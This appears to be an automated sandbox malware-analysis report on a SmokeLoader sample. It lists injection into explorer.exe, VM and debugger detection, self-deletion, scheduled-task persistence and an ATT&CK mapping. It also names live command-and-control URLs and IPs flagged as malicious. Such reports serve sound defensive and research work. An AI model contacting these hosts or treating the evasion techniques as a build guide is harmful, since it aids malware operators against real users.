Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_04072089 push esi; ret	4_2_0407208A
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_0406C4C3 push ecx; iretd	4_2_0406C4CF
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_04072ED0 push edx; retf	4_2_04072ED1
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_041A126C push ecx; iretd	4_2_041A1278
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 6_2_00401205 push ecx; iretd	6_2_00401211
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 6_2_004031E3 push eax; ret	6_2_004032BE

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ivfjsrs

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ivfjsrs

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\rbwtlpgnjc.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\ivfjsrs:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ivfjsrs, 00000004.00000002.2298319014.000000000405E000.00000004.00000020.00020000.00000000.sdmp, ivfjsrs, 00000006.00000002.4450947040.000000000414E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 395	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1690	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 885	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 387	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2929	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 862	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 887	Jump to behavior

Source: C:\Windows\explorer.exe TID: 5836	Thread sleep count: 395 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5812	Thread sleep count: 1690 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5812	Thread sleep time: -169000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5892	Thread sleep count: 885 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5892	Thread sleep time: -88500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4912	Thread sleep count: 250 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4688	Thread sleep count: 387 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4688	Thread sleep time: -38700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4480	Thread sleep count: 343 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4480	Thread sleep time: -34300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5812	Thread sleep count: 2929 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5812	Thread sleep time: -292900s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\ivfjsrs

Last function: Thread delayed

Source: explorer.exe, 00000002.00000000.2044572626.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000002.00000000.2046464539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2043431169.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.2043431169.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2042687938.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000002.00000000.2044572626.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000002.00000000.2046464539.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.2043431169.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2043431169.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 00000002.00000000.2042687938.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2044572626.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	System information queried: CodeIntegrityInformation	Jump to behavior

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe

Code function: 0_2_0040D21D LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,

0_2_0040D21D

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe

0_2_0040D21D

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_0413092B mov eax, dword ptr fs:[00000030h]	0_2_0413092B
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_04130D90 mov eax, dword ptr fs:[00000030h]	0_2_04130D90
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Code function: 0_2_0434B033 push dword ptr fs:[00000030h]	0_2_0434B033
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_0406B103 push dword ptr fs:[00000030h]	4_2_0406B103
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_041A092B mov eax, dword ptr fs:[00000030h]	4_2_041A092B
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 4_2_041A0D90 mov eax, dword ptr fs:[00000030h]	4_2_041A0D90
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 6_2_0413C59B push dword ptr fs:[00000030h]	6_2_0413C59B
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 6_2_05C60D90 mov eax, dword ptr fs:[00000030h]	6_2_05C60D90
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Code function: 6_2_05C6092B mov eax, dword ptr fs:[00000030h]	6_2_05C6092B

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: ivfjsrs.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 190.187.52.42 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 119.204.11.2 80			Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Thread created: C:\Windows\explorer.exe EIP: 33219D0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Thread created: unknown EIP: 31819D0			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\rBwTlpgnjc.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ivfjsrs	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2043086064.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2043086064.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2044391132.0000000004B00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2043086064.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2043086064.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2042687938.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	431 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	2 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
rBwTlpgnjc.exe	44%	Virustotal		Browse
rBwTlpgnjc.exe	100%	Avira	HEUR/AGEN.1361904
rBwTlpgnjc.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\ivfjsrs	100%	Avira	HEUR/AGEN.1361904
C:\Users\user\AppData\Roaming\ivfjsrs	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ivfjsrs	44%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
nidoe.org	20%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://word.office.comon	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
http://uama.com.ua/tmp/index.php	100%	Avira URL Cloud	malware
http://talesofpirates.net/tmp/index.php	100%	Avira URL Cloud	malware
http://sodez.ru/tmp/index.php	100%	Avira URL Cloud	malware
http://nidoe.org/tmp/index.php	100%	Avira URL Cloud	malware
http://talesofpirates.net/tmp/index.php	17%	Virustotal		Browse
http://sodez.ru/tmp/index.php	21%	Virustotal		Browse
http://nidoe.org/tmp/index.php	22%	Virustotal		Browse
http://uama.com.ua/tmp/index.php	18%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nidoe.org	119.204.11.2	true	true	20%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://talesofpirates.net/tmp/index.php	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://uama.com.ua/tmp/index.php	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://sodez.ru/tmp/index.php	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://nidoe.org/tmp/index.php	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000002.00000000.2046464539.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000000.2050412699.000000000C860000.00000004.00000001.00020000.00000000.sdmp	false		high
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000000.2044572626.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false		high
https://powerpoint.office.comcember	explorer.exe, 00000002.00000000.2049916857.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000002.00000000.2049916857.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/	explorer.exe, 00000002.00000000.2046464539.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://excel.office.com	explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 00000002.00000000.2045859613.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2045270374.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2045828799.0000000008870000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.v	explorer.exe, 00000002.00000000.2042687938.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.com	explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false		high
https://wns.windows.com/)s	explorer.exe, 00000002.00000000.2046464539.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
190.187.52.42	unknown	Peru		19180	AMERICATELPERUSAPE	true
119.204.11.2	nidoe.org	Korea Republic of		4766	KIXS-AS-KRKoreaTelecomKR	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432077
Start date and time:	2024-04-26 11:46:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rBwTlpgnjc.exe renamed because original name is a hash value
Original Sample Name:	ee4e08febd22e594c7bcb70ea1b0252a.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/2@6/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 43 Number of non-executed functions: 18
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:47:00	API Interceptor	513291x Sleep call for process: explorer.exe modified
11:47:17	Task Scheduler	Run new task: Firefox Default Browser Agent 68950386A9F11A8F path: C:\Users\user\AppData\Roaming\ivfjsrs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
190.187.52.42	SSDAIG33Zh.exe	Get hash	malicious	Babuk, Djvu	Browse	sdfjhuz.com/dl/build2.exe
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	habrafa.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
	fnKtfdi0P0.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc, Xmrig	Browse	emgvod.com/uploads/logo3.jpg
	O1yQjHheL6.exe	Get hash	malicious	Amadey, PureLog Stealer, SmokeLoader	Browse	emgvod.com/uploads/logo3.jpg
	Oa5MQwNPBq.exe	Get hash	malicious	LummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoader	Browse	habrafa.com/test1/get.php?pid=589A025AAF5058B231B95CD1C4770414
	fcdf869bc179759c8be3093adec60b334d25cad63b78fd3d28229b0af88b765b_dump.exe	Get hash	malicious	SmokeLoader	Browse	sjyey.com/tmp/index.php
	Qkk9UKA1cW.exe	Get hash	malicious	SmokeLoader	Browse	gxutc2c.com/tmp/index.php
	SecuriteInfo.com.Win32.DropperX-gen.5130.14297.exe	Get hash	malicious	SmokeLoader	Browse	gxutc2c.com/tmp/index.php
	toolspub1.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	habrafa.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54
	vRngJnoGJU.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, SmokeLoader, Vidar	Browse	habrafa.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nidoe.org	SecuriteInfo.com.Trojan.Siggen28.25504.27914.23637.exe	Get hash	malicious	Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	211.202.224.10
	SecuriteInfo.com.Win32.BotX-gen.23345.1691.exe	Get hash	malicious	PureLog Stealer, SmokeLoader	Browse	189.146.143.77
	SecuriteInfo.com.Win32.PWSX-gen.16966.19531.exe	Get hash	malicious	PureLog Stealer, SmokeLoader	Browse	93.136.70.55
	file.exe	Get hash	malicious	PureLog Stealer, SmokeLoader	Browse	92.36.226.66
	5J2C26juDg.exe	Get hash	malicious	SmokeLoader	Browse	190.249.187.165
	file.exe	Get hash	malicious	SmokeLoader	Browse	95.158.162.200
	file.exe	Get hash	malicious	SmokeLoader	Browse	211.168.53.110
	2LksWs2xq7.exe	Get hash	malicious	SmokeLoader	Browse	175.119.10.231
